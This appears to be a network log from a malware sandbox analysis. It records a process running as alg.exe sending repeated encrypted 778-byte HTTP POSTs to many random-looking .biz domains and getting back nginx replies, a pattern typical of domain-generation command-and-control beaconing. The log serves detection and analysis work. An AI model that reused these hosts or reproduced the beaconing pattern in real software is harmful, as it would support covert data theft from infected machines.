                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 2k(eOt~7E*P+y-DUf@F%>jKyrb[4Z-%:fGfZu%V_gq"[LO2yyau+z<6^4|aL9/nP@X7"G37F9Pa(Y)oDy@2/c[X0
Oct 28, 2024 16:50:46.573523045 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=628c2ccdd12dab30889d6cb69674e49f|155.94.241.188|1730130646|1730130646|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49947 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:46.822643995 CET | 345 | OUT | POST /kb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822664022 CET778OUTData Raw: 48 7a 35 fd ea c6 f6 07 fe 02 00 00 ce 74 c7 03 fa 40 52 56 32 5c 73 48 37 8d 3f 63 39 39 0f 7a 2f d1 db a9 d4 08 93 05 0a 67 6b 59 a8 6c 3f e0 e9 40 93 c8 df 7b 38 a4 b2 25 a4 0d 50 1e 32 db 62 5e cf 6d 15 b2 bb a8 44 c3 a6 b1 78 f5 b5 e4 3a b7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Hz5t@RV2\sH7?c99z/gkYl?@{8%P2b^mDx:2j4Ns8pgDBGq"(2^9(OE42X- YQ!T:_xqwfjL Xq==7erXJE_XN]FtX=yqb0>5
Oct 28, 2024 16:50:48.250859976 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=87ae6604782ae2102966e3ac8490597a|155.94.241.188|1730130647|1730130647|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49958 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:48.585644007 CET | 346 | OUT | POST /ofmvo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585679054 CET778OUTData Raw: cf b0 14 41 5c 13 03 68 fe 02 00 00 05 b5 31 cc 44 1e 1a 7a f1 60 6e 5f 99 19 0d f2 1e fb 87 26 cc 2b e2 16 40 8a 8b d6 51 76 22 5a 56 0e 10 26 e9 4c 0f fd 1f 84 c1 7a f0 d6 58 12 dd 90 ba f4 76 2c 44 dc 33 7e f3 98 b6 18 fd b6 7d 4e 9d 2a f5 22
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: A\h1Dz`n_&+@Qv"ZV&LzXv,D3~}N*"0w;}p5hr$`sTxO1!>Vb9<a<G%B~1ibyZikX!Tpj^H/^O!TyWlAevWn7z{0x]#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49960 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:49.301923990 CET | 349 | OUT | POST /ckdrshko HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.302012920 CET778OUTData Raw: f7 9c 7f 54 85 53 77 51 fe 02 00 00 cd 79 53 cf 2d dc 70 88 a0 10 5a 82 2c 8a 96 c4 96 05 6f 68 bf 17 4f ec c9 29 77 34 89 00 a5 c5 61 d0 04 7b 73 8f bf 5f 81 fd f4 05 1d 27 c0 f4 eb 52 2d f9 72 aa 08 61 7c 80 6f cc ba 61 93 fc 51 95 dc 6d 11 7c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: TSwQyS-pZ,ohO)w4a{s_'R-ra|oaQm|,r:w7u3fGDt 39bkdQav^V-O]8+C%?rmiVVcn:u&m|0+.#vL^% fsx7@Qhu]qR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49966 | 34.246.200.160 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:50.206497908 CET | 358 | OUT | POST /qearwetpmwvhvwhi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:50.206515074 CET | 778 | OUT | Data Raw: (binary request body)
Oct 28, 2024 16:50:51.183917046 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a1fad22a774aac24e80974858558745e|155.94.241.188|1730130651|1730130651|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49975 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:51.454699993 CET | 342 | OUT | POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:51.454727888 CET | 778 | OUT | Data Raw: (binary request body)
Oct 28, 2024 16:50:52.157196045 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=aabddc3828a39ee7620bea5bf54b9a0b|155.94.241.188|1730130652|1730130652|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49982 | 208.100.26.245 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:52.413630962 CET | 357 | OUT | POST /pubppqcmfqvto HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:52.416934967 CET | 778 | OUT | Data Raw: (binary request body)
Oct 28, 2024 16:50:53.053874969 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:50:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:50:53.114195108 CET 356 OUT POST /hrtvnxyfpkjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:50:53.114228010 CET 778 OUT Data Raw: 9b 15 f5 1c 45 20 f6 ee fe 02 00 00 67 f3 ec 29 60 87 74 15 f0 8d 67 12 b6 36 40 2e 24 10 8b 06 37 d9 59 aa e8 fe 1e f2 b2 c7 be 32 1e 0e 2d 0d 8e 60 99 59 17 77 c0 89 dc 91 9a d2 b6 f5 70 33 98 cc 16 30 f1 ea 32 98 fe 76 1e 16 11 f3 c0 97 3c 90
Oct 28, 2024 16:50:53.261414051 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:01.995723009 CET 353 OUT POST /dovasmbpdb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:01.995769978 CET 778 OUT Data Raw: 02 4a 39 47 fc f5 b0 bc fe 02 00 00 de 9a e9 ff f3 7a a0 49 28 5a 09 42 09 b1 25 53 22 fb 02 66 34 7d dc 6e 06 73 a9 e8 4d b5 db 2c ee 63 58 95 c4 f2 d1 83 a3 83 b7 14 51 da bf 33 cb cc 45 f4 89 40 67 14 1d fb cf 34 6d 16 3c 37 18 b6 c8 05 a1 85
Oct 28, 2024 16:51:02.143939018 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:02.414597988 CET 357 OUT POST /arqypullvoovtl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:51:02.414647102 CET 778 OUT Data Raw: 64 5d 32 25 ea ed 5e 4e fe 02 00 00 61 a3 2b 8f 7f ba d7 77 ee b5 0c b4 36 5c 4c c8 88 9d 38 e8 1a 8d 3b 35 68 ce a0 20 81 34 ef e2 92 f1 d9 23 37 5f db b7 9c d8 92 d1 99 b8 79 a1 1b 72 9b 73 28 ef c9 0b 29 68 fd 96 6d 29 9d 52 9d 2f 70 c7 2a fb
Oct 28, 2024 16:51:02.560302973 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:02.850526094 CET 744 IN HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:48.645169020 CET  358  OUT  POST /cftycvbqsjsfc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:48.645198107 CET  778  OUT  Data Raw: 2c 57 41 34 76 d1 0a 73 fe 02 00 00 1b e6 57 f9 78 8b 57 46 4b 7e 48 ce 66 d3 95 f2 28 48 13 96 02 8b e2 3b e4 b1 b9 3f 12 92 2c eb a8 81 95 29 b9 ab a0 22 7c 29 ce 25 ac 25 e4 bd da a4 9d 05 c1 b5 d2 79 23 b5 aa 3b ad 50 f6 87 e1 5e 1f 84 c9 e3
Data Ascii: ,WA4vsWxWFK~Hf(H;?,)"|)%%y#;P^A!x|q?KE(<xHVS+{rg>vRp<uK[xiT6o7Xu>%Q9t4ly`kWmd:#FG{mTl7::)-'o,
Oct 28, 2024 16:51:48.791265011 CET  744  IN  HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:51:48 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:48.794641972 CET  356  OUT  POST /klbxxtxcjep HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:48.794708014 CET  778  OUT  Data Raw: 2a 26 3c c9 e8 ab b1 a4 fe 02 00 00 2e 78 30 27 ac ef d5 9c d1 05 86 9a 96 f3 b0 3b 94 e1 f2 52 01 2b 5a 1c 95 01 2e bf f4 a4 bd 20 41 39 f1 10 07 be 49 26 d2 1a 11 51 33 ac fd d8 3b e9 f5 28 3f 9f f2 08 67 dc 6f 3b 32 6b 72 e9 9b 44 5b c4 2a a7
Data Ascii: *&<.x0';R+Z. A9I&Q3;(?go;2krD[*,!AgRWA!4ebc&9-4JBIO\zfllz?fM{H|kitS#/C;xJv((UDmUi*&?i4o~
Oct 28, 2024 16:51:48.940088987 CET  744  IN  HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:51:48 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 28, 2024 16:51:49.229429960 CET  744  IN  HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 28 Oct 2024 15:51:48 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.5  49988        13.251.16.150   80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:50:53.524434090 CET  345  OUT  POST /vvo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:53.524463892 CET  778  OUT  Data Raw: c9 62 6b 05 8a ad 1d 74 fe 02 00 00 c9 f5 0b 86 e7 2b 63 81 3c c1 a5 97 14 b5 b2 03 db d0 98 f3 1e a3 ca 4f dc 7f e2 a0 35 bd 4f 64 9e 08 48 0e 96 73 9c b9 a5 44 ed 09 6e 5a a0 a1 26 7f 65 0e c5 9a 11 b1 c2 6b 16 68 db 36 8b 83 63 a6 69 5d eb e6
Data Ascii: bkt+c<O5OdHsDnZ&ekh6ci]4*a:`>gJwUSF'"y]dr~.v@ O(#.js'OIEMYK.RAY]eNHsgov7i?#K0+O!v6
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:54.967310905 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=86ca7775915f6bdc14e9ce49cbda3580|155.94.241.188|1730130654|1730130654|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49999 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:55.584899902 CET | 347 | OUT | POST /ql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:55.584944963 CET | 778 | OUT | Data Raw: 1a 6c 84 7d 81 98 18 bc fe 02 00 00 b3 83 dd e8 f2 16 1d 8a 71 8c 64 0c ac d3 f1 cb 27 ed f0 44 60 d1 0a 1b 8d 04 c0 f5 b1 8f 1f 8e 04 10 5f 9b d2 d9 da 2f b9 c7 a3 f1 5f 06 64 56 43 1f 89 2d 4b ae 51 e9 f2 49 a6 b4 de 0e c3 f6 51 dd 36 63 66 4c
Data Ascii: l}qd'D`_/_dVC-KQIQ6cfLl+z7pHEg"+2%8-\Yu;wLKrl!Y~2n.C<w5pSkr;2`GED#E*f
Oct 28, 2024 16:50:56.242321968 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=08fc88269762d7a755c2595166b34a20|155.94.241.188|1730130656|1730130656|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50001 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:56.591741085 CET | 347 | OUT | POST /swl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:56.591767073 CET | 778 | OUT | Data Raw: a7 9c ed da 27 f7 94 05 fe 02 00 00 76 ae dc 8a c9 e6 bc f2 62 60 42 d1 eb dd 1a 1e 28 18 83 00 fe 8d 54 ae 42 64 96 18 67 3d 17 65 cc 8b 18 df 86 c3 a7 3c f4 90 b4 ef 40 74 59 d7 01 a2 ee ab 4d 92 53 66 e8 de b5 5b 17 19 13 4f 9c e8 d0 60 b5 33
Data Ascii: 'vb`B(TBdg=e<@tYMSf[O`3?1rq82] y%E8*Nag'1Uv0\%9639"W).!fhtR}epyw)o~Z"c,>:d&%j!FDl
